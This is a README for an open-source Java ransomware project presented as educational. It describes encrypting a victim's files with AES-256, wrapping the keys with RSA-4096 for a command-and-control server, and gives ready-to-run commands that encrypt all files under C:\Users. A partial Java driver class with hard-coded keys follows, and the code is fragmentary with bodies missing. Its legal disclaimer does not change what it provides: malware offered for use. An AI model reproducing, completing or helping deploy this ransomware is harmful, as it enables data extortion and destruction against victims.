JavaRansomware copied to clipboard
Simple Ransomware Tool in Pure Java
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's dataRansomware stops you from using your PC.Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware malware program may also be called a cryptovirus, cryptotrojan or cryptoworm It holds your PC or files for "ransom".
What does ransomware do?
There are different types of ransomware. However, all of them will prevent you from using your PC normally, and they will all ask you to do something before you can use your PC.
They can target any PC users, whether it’s a home computer, endpoints in an enterprise network, or servers used by a government agency or healthcare provider.
Ransomware can:
Prevent you from accessing Windows.
Encrypt files so you can't use them.
Stop certain apps from running (like your web browser).
Ransomware will demand that you pay money (a “ransom”) to get access to your PC or files. We have also seen them make you complete surveys.
There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
Project Summary
This project aims to build an almost functional crypto-ransomware for educational purposes, written in in pure java. Basically, it will encrypt your files in background using AES-256, a strong encryption algorithm, using RSA-4096 Public Key to secure the AES Symetric key and store it in an embeeded database.
Assume that there is a C & C Server who for store the Id and the respective encryption key and possibly act as a Command and Control server in the near future.
The malware encrypt with your RSA-4096 public key any payload before send then to the server. This approach with the https transport together make the security and authentication almost unbreakable (in theory).
For Education Purposes I will not Provide the Full Server source code.,as i decribed in the previous paragraph. Let's imagine a simple testing example which client by deafult has the Asymmetrtic encryption keys.
Usage and How it Works
The easiest way to run this Project is to use the the .jar open a cmd terminal and simply run the below commands
$ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished
$ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished
$ java -jar JavaRansomware.jar C:\Users Decrypt
if you want to use the project programmatically just put the below code in your project and simply run it. Don't forget to give Input arguments from the Command-Line Arguments. i've put a printscreen to see how to give Paramaters
Java Manual
public class App {
private static final String PubicKey = "MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJCw1HHQooCFGsGhtxNrsdS6dDq5jtfHqqLInCj7qFlDaD/Sll5+BAUjV0GU/c+6PVyMKzmLrHh49eeGQy1ETN8CAwEAAQ==";
private static final String PrivateKey = "MIIBVAIBADANBgkqhkiG9w0BAQEFAASCAT4wggE6AgEAAkEAkLDUcdCigIUawaG3E2ux1Lp0OrmO18eqosicKPuoWUNoP9KWXn4EBSNXQZT9z7o9XIwrOYuseHj154ZDLURM3wIDAQABAkA9AnLx8tkye+2GTBwYEkcPvfcYc/mpPsXSkehW15Zq3IALx3Kr5GgKGOaB2FK6PU0QzEPQbNJXdA5ZPjwTDcQBAiEA1/zINRVlrLpw2HPfqsYQ8ZSDuG2rVUUKKmKgJQXeQ98CIQCrfsw2+VKOaFoJm5BpVxIT5nsE8CXn4fr/WSFuklMXAQIgTKWnAreCKmbLTvTn5bl+H8zdZaB9kbf7YIk5XYoUky8CIQCL2ccnPYK5ZxelphrKDJtNZzMC/+OpiXtqKIE+7kycAQIgRK/DUhWUgSQV5u7VoCHDyLPCntjFMGBsg7Wi1uq+EDM=";
private static final String ENCRYPT = "ENCRYPT";
private static final String DECRYPT = "DECRYPT";
public static void main(String[] args) throws RansomwareException {
Processing(args[0], args[1]);
private static void Processing(final String toSearch, final String attack) throws RansomwareException {
final RansomProcess p = new RansomProcess(toSearch);
if (attack.equalsIgnoreCase(ENCRYPT))
else if (attack.equalsIgnoreCase(DECRYPT))
throw new RansomwareException("Mismatched Values Try again with correct one");
Legal Warning
While this may be helpful for some, there are significant risks. JavaRansomware may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail if if you will use it for malicious purposes.
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- Commit your changes: git commit -am 'Add some feature'
- Push to the branch: git push origin my-new-feature
- Submit a pull request :D
This project is licensed under the MIT License - see theLicence.mdfile for details